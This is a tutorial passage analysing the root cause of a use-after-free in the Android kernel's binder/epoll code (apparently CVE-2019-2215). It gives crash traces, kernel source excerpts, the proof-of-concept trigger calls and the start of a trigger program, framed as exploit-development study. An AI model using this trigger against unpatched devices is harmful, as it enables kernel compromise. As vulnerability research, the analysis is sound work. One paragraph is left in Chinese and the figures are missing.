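I wrote this handbook to learn kernel vulnerability analysis and exploit development on the Android platform, and to document the process along the way.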

0x01 Root Cause Analysis

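Root cause analysis (RCA) is a very important part of vulnerability research. RCA lets us determine whether a crash or a bug can be exploited.

RCA is a reverse engineering process whose goal is to understand the code that led to the crash.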

Revisiting the Crash

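From the crash log we already know that this is a Use-After-Free (UAF) vulnerability. Let's revisit the crash report and try to understand why it happened.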

We split the crash log into three parts: allocation, free and use.

Allocation

[< none >] save_stack_trace+0x16/0x18 arch/x86/kernel/stacktrace.c:59
[< inline >] save_stack mm/kasan/common.c:76
[< inline >] set_track mm/kasan/common.c:85
[< none >] __kasan_kmalloc+0x133/0x1cc mm/kasan/common.c:501
[< none >] kasan_kmalloc+0x9/0xb mm/kasan/common.c:515
[< none >] kmem_cache_alloc_trace+0x1bd/0x26f mm/slub.c:2819
[< inline >] kmalloc include/linux/slab.h:488
[< inline >] kzalloc include/linux/slab.h:661
[< none >] binder_get_thread+0x166/0x6db drivers/android/binder.c:4677
[< none >] binder_poll+0x4c/0x1c2 drivers/android/binder.c:4805
[< inline >] ep_item_poll fs/eventpoll.c:888
[< inline >] ep_insert fs/eventpoll.c:1476
[< inline >] SYSC_epoll_ctl fs/eventpoll.c:2128
[< none >] SyS_epoll_ctl+0x1558/0x24f0 fs/eventpoll.c:2014
[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292
[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233

Here is the simplified call graph.

The relevant source line from the PoC:

epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);

Free

[< none >] save_stack_trace+0x16/0x18 arch/x86/kernel/stacktrace.c:59
[< inline >] save_stack mm/kasan/common.c:76
[< inline >] set_track mm/kasan/common.c:85
[< none >] __kasan_slab_free+0x18f/0x23f mm/kasan/common.c:463
[< none >] kasan_slab_free+0xe/0x10 mm/kasan/common.c:471
[< inline >] slab_free_hook mm/slub.c:1407
[< inline >] slab_free_freelist_hook mm/slub.c:1458
[< inline >] slab_free mm/slub.c:3039
[< none >] kfree+0x193/0x5b3 mm/slub.c:3976
[< inline >] binder_free_thread drivers/android/binder.c:4705
[< none >] binder_thread_dec_tmpref+0x192/0x1d9 drivers/android/binder.c:2053
[< none >] binder_thread_release+0x464/0x4bd drivers/android/binder.c:4794
[< none >] binder_ioctl+0x48a/0x101c drivers/android/binder.c:5062
[< none >] do_vfs_ioctl+0x608/0x106a fs/ioctl.c:46
[< inline >] SYSC_ioctl fs/ioctl.c:701
[< none >] SyS_ioctl+0x75/0xa4 fs/ioctl.c:692
[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292
[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233

Here is the simplified call graph.

The relevant source line from the PoC:

ioctl(fd, BINDER_THREAD_EXIT, NULL);

Let's look at binder_free_thread, implemented in workshop/android-4.14-dev/goldfish/drivers/android/binder.c.

static void binder_free_thread(struct binder_thread *thread)

{

[...]

kfree(thread);

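}

We can see that binder_free_thread frees the binder_thread structure by calling kfree, which exactly matches the free call trace. This confirms that the dangling chunk is a binder_thread structure.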

Let's see how struct binder_thread is defined.

struct binder_thread {

struct binder_proc *proc;

struct rb_node rb_node;

struct list_head waiting_thread_node;

int pid;

int looper; /* only modified by this thread */

bool looper_need_return; /* can be written by other thread */

struct binder_transaction *transaction_stack;

struct list_head todo;

bool process_todo;

struct binder_error return_error;

struct binder_error reply_error;

wait_queue_head_t wait;

struct binder_stats stats;

atomic_t tmp_ref;

bool is_dead;

struct task_struct *task;

};

Use

[< none >] _raw_spin_lock_irqsave+0x3a/0x5d kernel/locking/spinlock.c:160
[< none >] remove_wait_queue+0x27/0x122 kernel/sched/wait.c:50
?[< none >] fsnotify_unmount_inodes+0x1e8/0x1e8 fs/notify/fsnotify.c:99
[< inline >] ep_remove_wait_queue fs/eventpoll.c:612
[< none >] ep_unregister_pollwait+0x160/0x1bd fs/eventpoll.c:630
[< none >] ep_free+0x8b/0x181 fs/eventpoll.c:847
?[< none >] ep_eventpoll_poll+0x228/0x228 fs/eventpoll.c:942
[< none >] ep_eventpoll_release+0x48/0x54 fs/eventpoll.c:879
[< none >] __fput+0x1f2/0x51d fs/file_table.c:210
[< none >] ____fput+0x15/0x18 fs/file_table.c:244
[< none >] task_work_run+0x127/0x154 kernel/task_work.c:113
[< inline >] exit_task_work include/linux/task_work.h:22
[< none >] do_exit+0x818/0x2384 kernel/exit.c:875
?[< none >] mm_update_next_owner+0x52f/0x52f kernel/exit.c:468
[< none >] do_group_exit+0x12c/0x24b kernel/exit.c:978
?[< inline >] spin_unlock_irq include/linux/spinlock.h:367
?[< none >] do_group_exit+0x24b/0x24b kernel/exit.c:975
[< none >] SYSC_exit_group+0x17/0x17 kernel/exit.c:989
[< none >] SyS_exit_group+0x14/0x14 kernel/exit.c:987
[< none >] do_syscall_64+0x19e/0x225 arch/x86/entry/common.c:292
[< none >] entry_SYSCALL_64_after_hwframe+0x3d/0xa2 arch/x86/entry/entry_64.S:233

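Here is the simplified call graph.

No line in the PoC calls SyS_exit_group. The use actually happens when the process exits and the exit_group system call is eventually invoked. While cleaning up the process's resources, the kernel touches the dangling chunk.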

Visual Studio Code

We will use Visual Studio Code to navigate the Android kernel source. I use the project https://github.com/amezin/vscode-linux-kernel for better IntelliSense support.

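Static Analysis

We already know that binder_thread is the dangling chunk. Let's statically trace the function calls made by the crashing PoC and see what happens.

We want to answer the following questions:

· Why is the binder_thread structure allocated?

· Why is the binder_thread structure freed?

· Why is the binder_thread structure used after it has been freed?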

open

fd = open("/dev/binder", O_RDONLY);

Let's open workshop/android-4.14-dev/goldfish/drivers/android/binder.c and see how the open system call is implemented.

static const struct file_operations binder_fops = {

[...]

.open = binder_open,

[...]

};

We can see that the open system call is handled by the binder_open function.

Let's focus on binder_open and find out what it does.

static int binder_open(struct inode *nodp, struct file *filp)

{

struct binder_proc *proc;

[...]

proc = kzalloc(sizeof(*proc), GFP_KERNEL);

if (proc == NULL)

return -ENOMEM;

[...]

filp->private_data = proc;

[...]

return 0;

}

binder_open allocates a binder_proc structure and assigns it to filp->private_data.

epoll_create

epfd = epoll_create(1000);

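Open workshop/android-4.14-dev/goldfish/fs/eventpoll.c and look at how the epoll_create system call is implemented. We will also follow the call graph and study every important function that epoll_create calls.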

SYSCALL_DEFINE1(epoll_create, int, size)

{

if (size <= 0)

return -EINVAL;

return sys_epoll_create1(0);

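}

epoll_create returns -EINVAL if size <= 0 and otherwise calls sys_epoll_create1. The value 1000 passed by the PoC has no special meaning. size only needs to be greater than 0.

Let's focus on the sys_epoll_create1 function.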
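Only the sign of size matters, and this can be confirmed from user space. The following is a minimal sketch. The helper name try_epoll_create is hypothetical: it calls epoll_create on a Linux host and reports either success or the negated errno.

```c
#include <errno.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Hypothetical helper: returns 0 if epoll_create(size) succeeds,
 * otherwise the negated errno (-EINVAL is expected for size <= 0). */
int try_epoll_create(int size)
{
    int epfd = epoll_create(size);
    if (epfd < 0)
        return -errno;
    close(epfd);   /* we only care whether creation succeeded */
    return 0;
}
```

The expected results are as follows. try_epoll_create(1000) and try_epoll_create(1) both return 0, while 0 and negative sizes are rejected with -EINVAL.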

SYSCALL_DEFINE1(epoll_create1, int, flags)

{

int error, fd;

struct eventpoll *ep = NULL;

struct file *file;

[...]

error = ep_alloc(&ep);

if (error < 0)

return error;

[...]

file = anon_inode_getfile("[eventpoll]", &eventpoll_fops, ep,

O_RDWR | (flags & O_CLOEXEC));

[...]

ep->file = file;

fd_install(fd, file);

return fd;

[...]

return error;

}

epoll_create1 calls ep_alloc, sets ep->file = file and finally returns the epoll file descriptor fd.

Next, let's look at ep_alloc and find out what it does.

static int ep_alloc(struct eventpoll **pep)

{

int error;

struct user_struct *user;

struct eventpoll *ep;

[...]

ep = kzalloc(sizeof(*ep), GFP_KERNEL);

[...]

init_waitqueue_head(&ep->wq);

init_waitqueue_head(&ep->poll_wait);

INIT_LIST_HEAD(&ep->rdllist);

ep->rbr = RB_ROOT_CACHED;

[...]

*pep = ep;

return 0;

[...]

return error;

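}

· Allocates struct eventpoll and initializes the wait queue members wq and poll_wait

· Initializes the rbr member, which is the root of a red-black tree

struct eventpoll is the main data structure used by the event poll subsystem. Let's see how it is defined in workshop/android-4.14-dev/goldfish/fs/eventpoll.c.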

struct eventpoll {

/* Protect the access to this structure */

spinlock_t lock;

/*

* This mutex is used to ensure that files are not removed

* while epoll is using them. This is held during the event

* collection loop, the file cleanup path, the epoll file exit

* code and the ctl operations.

*/

struct mutex mtx;

/* Wait queue used by sys_epoll_wait() */

wait_queue_head_t wq;

/* Wait queue used by file->poll() */

wait_queue_head_t poll_wait;

/* List of ready file descriptors */

struct list_head rdllist;

/* RB tree root used to store monitored fd structs */

struct rb_root_cached rbr;

/*

* This is a single linked list that chains all the "struct epitem" that

* happened while transferring ready events to userspace w/out

* holding ->lock.

*/

struct epitem *ovflist;

/* wakeup_source used when ep_scan_ready_list is running */

struct wakeup_source *ws;

/* The user that created the eventpoll descriptor */

struct user_struct *user;

struct file *file;

/* used to optimize loop detection check */

int visited;

struct list_head visited_list_link;

#ifdef CONFIG_NET_RX_BUSY_POLL

/* used to track busy poll napi_id */

unsigned int napi_id;

#endif

};

epoll_ctl

epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);

Let's open workshop/android-4.14-dev/goldfish/fs/eventpoll.c and see how epoll_ctl is implemented. We pass EPOLL_CTL_ADD as the operation argument.

SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,

struct epoll_event __user *, event)

{

int error;

int full_check = 0;

struct fd f, tf;

struct eventpoll *ep;

struct epitem *epi;

struct epoll_event epds;

struct eventpoll *tep = NULL;

error = -EFAULT;

if (ep_op_has_event(op) &&

copy_from_user(&epds, event, sizeof(struct epoll_event)))

goto error_return;

error = -EBADF;

f = fdget(epfd);

if (!f.file)

goto error_return;

/* Get the "struct file *" for the target file */

tf = fdget(fd);

if (!tf.file)

goto error_fput;

[...]

ep = f.file->private_data;

[...]

epi = ep_find(ep, tf.file, fd);

error = -EINVAL;

switch (op) {

case EPOLL_CTL_ADD:

if (!epi) {

epds.events |= POLLERR | POLLHUP;

error = ep_insert(ep, &epds, tf.file, fd, full_check);

} else

error = -EEXIST;

[...]

[...]

}

[...]

return error;

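}

· Copies the epoll_event structure from user space into kernel space

· Looks up the file pointers that correspond to the file descriptors epfd and fd

· Gets the pointer to the eventpoll structure from the private_data member of the epoll file (epfd)

· Calls ep_find to look up, in the red-black tree of the eventpoll structure, the epitem that matches the file descriptor fd

· If no epitem is found for fd, calls ep_insert to allocate an epitem and link it into the rbr member of the eventpoll structure

Let's see how struct epitem is defined.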

struct epitem {

union {

/* RB tree node links this structure to the eventpoll RB tree */

struct rb_node rbn;

/* Used to free the struct epitem */

struct rcu_head rcu;

};

/* List header used to link this structure to the eventpoll ready list */

struct list_head rdllink;

/*

* Works together "struct eventpoll"->ovflist in keeping the

* single linked chain of items.

*/

struct epitem *next;

/* The file descriptor information this item refers to */

struct epoll_filefd ffd;

/* Number of active wait queue attached to poll operations */

int nwait;

/* List containing poll wait queues */

struct list_head pwqlist;

/* The "container" of this item */

struct eventpoll *ep;

/* List header used to link this item to the "struct file" items list */

struct list_head fllink;

/* wakeup_source used when EPOLLWAKEUP is set */

struct wakeup_source __rcu *ws;

/* The structure that describe the interested events and the source fd */

struct epoll_event event;



};下面给出的图显示了epitem结构如何与eventpoll结构链接。

让我们跟随ep_insert函数,看看它到底是做什么的。

static int ep_insert(struct eventpoll *ep, struct epoll_event *event,

struct file *tfile, int fd, int full_check)

{

int error, revents, pwake = 0;

unsigned long flags;

long user_watches;

struct epitem *epi;

struct ep_pqueue epq;

[...]

if (!(epi = kmem_cache_alloc(epi_cache, GFP_KERNEL)))

return -ENOMEM;

/* Item initialization follow here ... */

INIT_LIST_HEAD(&epi->rdllink);

INIT_LIST_HEAD(&epi->fllink);

INIT_LIST_HEAD(&epi->pwqlist);

epi->ep = ep;

ep_set_ffd(&epi->ffd, tfile, fd);

epi->event = *event;

[...]

/* Initialize the poll table using the queue callback */

epq.epi = epi;

init_poll_funcptr(&epq.pt, ep_ptable_queue_proc);

[...]

revents = ep_item_poll(epi, &epq.pt);

[...]

ep_rbtree_insert(ep, epi);

[...]

return 0;

[...]

return error;

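}

· Uses a temporary ep_pqueue structure (a local variable on the stack)

· Allocates the epitem structure and initializes it

· Initializes the epi->pwqlist member, which is used to link the poll wait queues

· Calls ep_set_ffd to set the epitem members ffd.file = tfile and ffd.fd = fd. In our case these are binder's file structure pointer and its file descriptor.

· Sets epq.epi to the epi pointer

· Sets epq.pt._qproc to the address of the ep_ptable_queue_proc callback

· Calls ep_item_poll, passing epi and the address of epq.pt (the poll table) as arguments

· Finally, calls ep_rbtree_insert to link the epitem into the red-black tree rooted in the eventpoll structure

Let's follow ep_item_poll and find out what it does.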

static inline unsigned int ep_item_poll(struct epitem *epi, poll_table *pt)

{

pt->_key = epi->event.events;

return epi->ffd.file->f_op->poll(epi->ffd.file, pt) & epi->event.events;

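}

· Calls the poll function of binder's file structure (f_op->poll), passing binder's file structure pointer and the poll_table pointer

Note: at this point we jump from the epoll subsystem into the binder subsystem.

Let's open workshop/android-4.14-dev/goldfish/drivers/android/binder.c and see how the poll system call is implemented.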

static const struct file_operations binder_fops = {

[...]

.poll = binder_poll,

[...]

};

We can see that the poll system call is handled by the binder_poll function.

Let's focus on binder_poll and find out what it does.

static unsigned int binder_poll(struct file *filp,

struct poll_table_struct *wait)

{

struct binder_proc *proc = filp->private_data;

struct binder_thread *thread = NULL;

[...]

thread = binder_get_thread(proc);

if (!thread)

return POLLERR;

[...]

poll_wait(filp, &thread->wait, wait);

[...]

return 0;

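}

· Gets the pointer to the binder_proc structure from filp->private_data

· Calls binder_get_thread, passing the pointer to the binder_proc structure

· Finally calls poll_wait. The arguments are binder's file structure pointer, &thread->wait (a wait_queue_head_t pointer) and the poll_table_struct pointer.

Let's first understand what binder_get_thread does. After that, we will follow the poll_wait function.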

static struct binder_thread *binder_get_thread(struct binder_proc *proc)

{

struct binder_thread *thread;

struct binder_thread *new_thread;

[...]

thread = binder_get_thread_ilocked(proc, NULL);

[...]

if (!thread) {

new_thread = kzalloc(sizeof(*thread), GFP_KERNEL);

[...]

thread = binder_get_thread_ilocked(proc, new_thread);

[...]

}

return thread;

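}

· Calls binder_get_thread_ilocked to look up the binder_thread for the current thread in proc->threads.rb_node

· If none is found, allocates a new binder_thread structure

· Finally calls binder_get_thread_ilocked again, which initializes the newly allocated binder_thread and links it into proc->threads.rb_node, which is essentially a red-black tree node

If you look at the call graph in the Allocation section, you will find that this is where the binder_thread structure is allocated.

Now, let's follow the poll_wait function and find out what it does.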

static inline void poll_wait(struct file * filp, wait_queue_head_t * wait_address, poll_table *p)

{

if (p && p->_qproc && wait_address)

p->_qproc(filp, wait_address, p);

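}

· Calls the callback function stored in p->_qproc, passing binder's file structure pointer, the wait_queue_head_t pointer and the poll_table pointer

If you look back at the ep_insert function, you will see that p->_qproc was set to the address of ep_ptable_queue_proc.

Note: now we jump from the binder subsystem back into the epoll subsystem.

Let's open workshop/android-4.14-dev/goldfish/fs/eventpoll.c and try to understand the ep_ptable_queue_proc function.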

/*

* This is the callback that is used to add our wait queue to the

* target file wakeup lists.

*/

static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead,

poll_table *pt)

{

struct epitem *epi = ep_item_from_epqueue(pt);

struct eppoll_entry *pwq;

if (epi->nwait >= 0 && (pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL))) {

init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);

pwq->whead = whead;

pwq->base = epi;

if (epi->event.events & EPOLLEXCLUSIVE)

add_wait_queue_exclusive(whead, &pwq->wait);

else

add_wait_queue(whead, &pwq->wait);

list_add_tail(&pwq->llink, &epi->pwqlist);

epi->nwait++;

} else {

/* We have to signal that an error occurred */

epi->nwait = -1;

}

}

· Calls ep_item_from_epqueue to get the epitem pointer from the poll_table

· Allocates an eppoll_entry structure and initializes its members

· Sets the whead member of eppoll_entry to the wait_queue_head_t pointer passed in by binder_poll. This is essentially a pointer to binder_thread->wait.

· Calls add_wait_queue to link eppoll_entry->wait into whead (binder_thread->wait)

· Finally calls list_add_tail to link eppoll_entry->llink into epitem->pwqlist

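Note: the code saves references to binder_thread->wait in two places. The first reference is stored in eppoll_entry->whead. The second is stored in eppoll_entry->wait, whose list entry is linked into the binder_thread->wait.head list.

Let's see how struct eppoll_entry is defined.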
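The hand-off between ep_insert, binder_poll and ep_ptable_queue_proc is easier to follow as a simplified user-space model. Every mock_* type and function below is a hypothetical stand-in. The real kernel allocates an eppoll_entry and links its wait entry into the wait queue; this sketch reduces that step to storing the wait queue head pointer. The model does keep the two mechanisms the kernel relies on:

- The poll_table carries a callback pointer.
- The callback recovers its enclosing ep_pqueue, and thus the epitem, with container_of, as ep_item_from_epqueue does.

```c
#include <stddef.h>

/* Same idea as the kernel macro: step back from a member to its container. */
#define container_of(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

struct mock_wait_queue_head { int lock; };   /* stands in for binder_thread->wait */

struct mock_poll_table;
typedef void (*mock_queue_proc)(void *file, struct mock_wait_queue_head *whead,
                                struct mock_poll_table *pt);
struct mock_poll_table { mock_queue_proc _qproc; };

struct mock_epitem {
    struct mock_wait_queue_head *whead;  /* like eppoll_entry->whead */
    int nwait;
};

/* Mirrors struct ep_pqueue: poll table embedded next to the epitem pointer. */
struct mock_ep_pqueue {
    struct mock_poll_table pt;
    struct mock_epitem *epi;
};

/* Mirrors poll_wait(): only calls the callback when everything is set. */
static void mock_poll_wait(void *file, struct mock_wait_queue_head *wait_address,
                           struct mock_poll_table *p)
{
    if (p && p->_qproc && wait_address)
        p->_qproc(file, wait_address, p);
}

/* Mirrors ep_ptable_queue_proc(): find the epitem via container_of and
 * remember the wait queue head that belongs to the "binder" object. */
static void mock_ep_ptable_queue_proc(void *file, struct mock_wait_queue_head *whead,
                                      struct mock_poll_table *pt)
{
    (void)file;
    struct mock_epitem *epi = container_of(pt, struct mock_ep_pqueue, pt)->epi;
    epi->whead = whead;
    epi->nwait++;
}

/* Mirrors binder_poll(): hands its per-thread wait queue head to poll_wait(). */
static void mock_binder_poll(void *file, struct mock_wait_queue_head *thread_wait,
                             struct mock_poll_table *pt)
{
    mock_poll_wait(file, thread_wait, pt);
}

/* Runs the ep_insert -> ep_item_poll -> binder_poll chain once and returns
 * the wait queue head pointer the "epoll side" ended up storing. */
struct mock_wait_queue_head *simulate_ep_insert(struct mock_epitem *epi,
                                                struct mock_wait_queue_head *thread_wait)
{
    struct mock_ep_pqueue epq;
    epq.epi = epi;
    epq.pt._qproc = mock_ep_ptable_queue_proc;   /* like init_poll_funcptr() */
    mock_binder_poll(NULL, thread_wait, &epq.pt);
    return epi->whead;
}
```

After simulate_ep_insert returns, the epitem holds a pointer into the "binder" object. That is exactly the kind of reference that dangles once the object is freed.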

struct eppoll_entry {

/* List header used to link this structure to the "struct epitem" */

struct list_head llink;

/* The "base" pointer is set to the container "struct epitem" */

struct epitem *base;

/*

* Wait queue item that will be linked to the target file wait

* queue head.

*/

wait_queue_entry_t wait;

/* The wait queue head that linked the "wait" wait queue item */

wait_queue_head_t *whead;

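};

The figure below is a simplified call graph showing how the binder_thread structure is allocated and linked into the epoll subsystem.

The next figure shows how the eventpoll structure is connected to the binder_thread structure.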

ioctl

ioctl(fd, BINDER_THREAD_EXIT, NULL);

Open workshop/android-4.14-dev/goldfish/drivers/android/binder.c and see how the ioctl system call is implemented.

static const struct file_operations binder_fops = {

[...]

.unlocked_ioctl = binder_ioctl,

.compat_ioctl = binder_ioctl,

[...]

};

We can see that both unlocked_ioctl and compat_ioctl calls are handled by the binder_ioctl function.

Let's focus on binder_ioctl and see how it handles the BINDER_THREAD_EXIT request.

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)

{

int ret;

struct binder_proc *proc = filp->private_data;

struct binder_thread *thread;

unsigned int size = _IOC_SIZE(cmd);

void __user *ubuf = (void __user *)arg;

[...]

thread = binder_get_thread(proc);

[...]

switch (cmd) {

[...]

case BINDER_THREAD_EXIT:

[...]

binder_thread_release(proc, thread);

thread = NULL;

break;

[...]

default:

ret = -EINVAL;

goto err;

}

ret = 0;

[...]

return ret;

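}

· Calls binder_get_thread to get the pointer to the binder_thread structure from the binder_proc structure

· Calls binder_thread_release, passing pointers to the binder_proc and binder_thread structures as arguments

Let's follow binder_thread_release and find out what it does.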

static int binder_thread_release(struct binder_proc *proc,

struct binder_thread *thread)

{

[...]

int active_transactions = 0;

[...]

binder_thread_dec_tmpref(thread);

return active_transactions;

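}

Note: remember that we applied a custom patch to this very function to reintroduce the vulnerability.

· The interesting part of this function is that it calls binder_thread_dec_tmpref, passing the pointer to the binder_thread structure

Let's follow binder_thread_dec_tmpref and find out what it does.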

static void binder_thread_dec_tmpref(struct binder_thread *thread)

{

[...]

if (thread->is_dead && !atomic_read(&thread->tmp_ref)) {

[...]

binder_free_thread(thread);

return;

}

[...]

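}

· If the thread is dead (is_dead) and its tmp_ref count is zero, calls binder_free_thread, passing the binder_thread structure pointer

Let's follow binder_free_thread and find out what it does.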

static void binder_free_thread(struct binder_thread *thread)

{

[...]

kfree(thread);

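}

· Calls kfree to free the kernel heap chunk that holds the binder_thread structure

If you look at the call graph in the Free section, you will find that this is where the binder_thread structure is freed.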

ep_remove

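If you look at the call graph in the Use section, you will find that ep_unregister_pollwait is called while the exit_group system call executes. exit_group is usually called when a process exits. During exploit development, however, we want to be able to trigger ep_unregister_pollwait whenever we like.

Let's look at workshop/android-4.14-dev/goldfish/fs/eventpoll.c and figure out how to reach ep_unregister_pollwait at will. Basically, we want to examine the callers of ep_unregister_pollwait.

Looking through the code, I found two interesting callers: ep_remove and ep_free. ep_remove is the better choice because it can be reached through the epoll_ctl system call with EPOLL_CTL_DEL as the operation argument.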

SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,

struct epoll_event __user *, event)

{

[...]

struct eventpoll *ep;

struct epitem *epi;

[...]

error = -EINVAL;

switch (op) {

[...]

case EPOLL_CTL_DEL:

if (epi)

error = ep_remove(ep, epi);

else

error = -ENOENT;

break;

[...]

}

[...]

return error;

}

The line of code below triggers ep_unregister_pollwait at will.

epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);
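The EPOLL_CTL_ADD and EPOLL_CTL_DEL branches shown above can be observed without binder. The following sketch uses a hypothetical helper name. It adds the read end of a pipe to an epoll instance twice and then deletes it twice. Following the kernel code above, the four results should be:

1. 0
2. -EEXIST (an epi was already found)
3. 0 (ep_remove ran)
4. -ENOENT (no epi left)

```c
#include <errno.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Hypothetical helper: exercises the ADD/DEL branches of epoll_ctl() on a pipe.
 * Fills results[0..3] with 0 or -errno for: ADD, ADD again, DEL, DEL again.
 * Returns 0 on success, -1 if the pipe or epoll instance could not be created. */
int epoll_add_del_results(int results[4])
{
    int fds[2];
    if (pipe(fds) < 0)
        return -1;
    int epfd = epoll_create(1000);
    if (epfd < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    struct epoll_event event = { .events = EPOLLIN };
    const int ops[4] = { EPOLL_CTL_ADD, EPOLL_CTL_ADD, EPOLL_CTL_DEL, EPOLL_CTL_DEL };
    for (int i = 0; i < 4; i++)
        results[i] = epoll_ctl(epfd, ops[i], fds[0], &event) < 0 ? -errno : 0;

    close(epfd);
    close(fds[0]);
    close(fds[1]);
    return 0;
}
```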

Let's follow the ep_remove function and find out what it does.

static int ep_remove(struct eventpoll *ep, struct epitem *epi)

{

[...]

ep_unregister_pollwait(ep, epi);

[...]

return 0;

}

· Calls ep_unregister_pollwait, passing pointers to the eventpoll and epitem structures as arguments

Let's follow the ep_unregister_pollwait function and find out what it does.

static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)

{

struct list_head *lsthead = &epi->pwqlist;

struct eppoll_entry *pwq;

while (!list_empty(lsthead)) {

pwq = list_first_entry(lsthead, struct eppoll_entry, llink);

[...]

ep_remove_wait_queue(pwq);

[...]

}

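}

· Gets the list_head pointer of the poll wait queue list from epi->pwqlist

· Uses list_first_entry to get a pointer to the first eppoll_entry in that list through its llink member, which is of type struct list_head

· Calls ep_remove_wait_queue, passing the pointer to the eppoll_entry as the argument

Let's follow the ep_remove_wait_queue function and find out what it does.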

static void ep_remove_wait_queue(struct eppoll_entry *pwq)

{

wait_queue_head_t *whead;

[...]

whead = smp_load_acquire(&pwq->whead);

if (whead)

remove_wait_queue(whead, &pwq->wait);

[...]

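}

· Gets the wait_queue_head_t pointer from eppoll_entry->whead

· Calls remove_wait_queue, passing the wait_queue_head_t pointer and a pointer to eppoll_entry->wait as arguments

Note: both eppoll_entry->whead and eppoll_entry->wait hold references to the dangling binder_thread structure.

Let's open workshop/android-4.14-dev/goldfish/kernel/sched/wait.c and focus on the remove_wait_queue function to figure out what it does.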

void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)

{

unsigned long flags;

spin_lock_irqsave(&wq_head->lock, flags);

__remove_wait_queue(wq_head, wq_entry);

spin_unlock_irqrestore(&wq_head->lock, flags);

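}

· Calls spin_lock_irqsave with a pointer to wait_queue_head->lock to acquire the lock

Note: the stack trace in the Use section shows that the crash happens because _raw_spin_lock_irqsave uses the dangling chunk. This is the first place where the dangling chunk is used. Remember that wait_queue_entry also contains a reference to the dangling chunk.

· Calls __remove_wait_queue, passing pointers to the wait_queue_head and wait_queue_entry structures as arguments

Let's open workshop/android-4.14-dev/goldfish/include/linux/wait.h and focus on the __remove_wait_queue function to figure out what it does.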

static inline void

__remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)

{

list_del(&wq_entry->entry);

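}

· Calls list_del, passing a pointer to wait_queue_entry->entry, which is of type struct list_head

Note: the wait_queue_head argument is ignored and not used afterwards.

Let's open workshop/android-4.14-dev/goldfish/include/linux/list.h and focus on the list_del function to figure out what it does.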

static inline void list_del(struct list_head *entry)

{

__list_del_entry(entry);

[...]

}

static inline void __list_del_entry(struct list_head *entry)

{

[...]

__list_del(entry->prev, entry->next);

}

static inline void __list_del(struct list_head * prev, struct list_head * next)

{

next->prev = prev;

WRITE_ONCE(prev->next, next);

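}

This is the unlink operation. eppoll_entry->wait.entry is the only entry in the list, so both its prev and next point to binder_thread->wait.head. Unlinking eppoll_entry->wait.entry from binder_thread->wait.head therefore writes a pointer to binder_thread->wait.head into both binder_thread->wait.head.next and binder_thread->wait.head.prev.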

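This is a better primitive than the first use of the dangling chunk. The figures below illustrate how a circular doubly linked list works, to give you a better picture of what actually happens.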

Let's see what a single initialized node node1 looks like. In our context, node1 is binder_thread->wait.head and node2 is eppoll_entry->wait.entry.

Now look at how the two nodes node1 and node2 are linked.

Finally, look at what node1 looks like after node2 is unlinked.
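A minimal user-space copy of the list operations makes the effect of the unlink concrete. This is a sketch, not the kernel header, and it differs from the kernel in two ways:

- list_del_between is a hypothetical name for the kernel's __list_del.
- This model writes NULL into the removed entry, where the kernel's list_del writes the LIST_POISON1 and LIST_POISON2 values.

Here node1 plays binder_thread->wait.head and node2 plays eppoll_entry->wait.entry.

```c
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

/* An empty list: the head points to itself in both directions. */
static void INIT_LIST_HEAD(struct list_head *list)
{
    list->next = list;
    list->prev = list;
}

/* Insert new_entry right after head (what add_wait_queue ends up doing). */
static void list_add(struct list_head *new_entry, struct list_head *head)
{
    struct list_head *next = head->next;
    next->prev = new_entry;
    new_entry->next = next;
    new_entry->prev = head;
    head->next = new_entry;
}

/* Hypothetical name for the kernel's __list_del(): bridge prev and next. */
static void list_del_between(struct list_head *prev, struct list_head *next)
{
    next->prev = prev;
    prev->next = next;   /* WRITE_ONCE() in the kernel */
}

/* Unlink entry; the kernel poisons entry->next/prev, this model uses NULL. */
static void list_del(struct list_head *entry)
{
    list_del_between(entry->prev, entry->next);
    entry->next = NULL;
    entry->prev = NULL;
}
```

After list_del(&node2), node1.next and node1.prev both point back to &node1. This is the self-referencing pattern that the unlink leaves inside the freed binder_thread.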

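Static Analysis Recap

Let's recap what we learned in the root cause analysis.

At the beginning of the Static Analysis section we asked three questions. Let's answer them.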

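· Why is the binder_thread structure allocated?

  · ep_insert triggers binder_poll by calling ep_item_poll

  · binder_poll tries to find the thread to use in the red-black tree and, if none is found, allocates a new binder_thread structure

· Why is the binder_thread structure freed?

  · It is freed when the ioctl system call is called explicitly with BINDER_THREAD_EXIT as the operation code

· Why is the binder_thread structure used after it has been freed?

  · When the binder_thread structure is freed explicitly, the pointers to binder_thread->wait.head held in eppoll_entry->whead and eppoll_entry->wait.entry are not removed

  · The eventpoll is eventually torn down, either by calling epoll_ctl with EPOLL_CTL_DEL as the operation argument or when the epoll file is released at process exit. At that point it tries to unlink all wait queues and uses the dangling binder_thread structure.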
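Putting the answers together, the trigger sequence can be sketched in C as follows. This is a hedged reconstruction from the PoC lines quoted in this section, not the workshop's cve-2019-2215-trigger source. Several details are assumptions:

- The function name binder_uaf_trigger and the del_now switch are hypothetical.
- The EPOLLIN event mask is an assumption.
- BINDER_THREAD_EXIT is defined locally, assuming it matches the UAPI value _IOW('b', 8, __s32).

Only run it inside the vulnerable emulator.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* Assumption: mirrors BINDER_THREAD_EXIT from the binder UAPI header,
 * _IOW('b', 8, __s32); int has the same size as __s32 here. */
#ifndef BINDER_THREAD_EXIT
#define BINDER_THREAD_EXIT _IOW('b', 8, int)
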